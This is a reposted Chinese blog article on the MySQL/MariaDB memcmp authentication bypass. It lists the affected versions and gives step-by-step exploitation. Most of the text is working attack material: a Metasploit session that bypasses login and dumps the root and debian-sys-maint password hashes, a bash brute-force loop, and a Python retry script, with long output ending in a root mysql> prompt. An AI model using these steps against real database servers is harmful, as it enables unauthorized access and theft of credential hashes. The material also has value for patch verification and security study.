也想出现在这里? 联系我们

Mysql身份认证漏洞的分析以及利用

作者 : 小编 本文共16973个字,预计阅读时间需要43分钟 发布时间: 2021-06-20 共3.07K人阅读
也想出现在这里? 联系我们

当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。而且漏洞利用工具已经出现。 受影响的产品: All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable. MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not. 网上已经出了metasploit版本的相应利用工具 利用方法如下

复制代码

代码如下:

$ msfconsole msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1 msf auxiliary(mysql_authbypass_hashdump) > run [+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test [*] 127.0.0.1:3306 Authentication bypass is 10% complete [*] 127.0.0.1:3306 Authentication bypass is 20% complete [*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts [+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes… [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89 [*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

测试方法2: $ for i in `seq 1 1000`; do mysql -u root –password=bad -h 127.0.0.1 2>/dev/null; done mysql> 测试方法3:

复制代码

代码如下:

#!/usr/bin/python import subprocess while 1: subprocess.Popen(\”mysql -u root mysql –password=blah\”, shell=True).wait() 如下: relik@stronghold:~# python mysql_bypass.py ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@\’localhost’ (using password: YES) Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Welcome to the MySQL monitor. Commands end with ; or \\g. Your MySQL connection id is 24598 www.jb51.net Server version: 5.1.62-0ubuntu0.11.10.1 (Ubuntu) Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type ‘help;’ or ‘\\h’ for help. Type ‘\\c’ to clear the current input statement. mysql>
1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » Mysql身份认证漏洞的分析以及利用

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html

发表评论

Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
开通VIP 享更多特权,建议使用QQ登录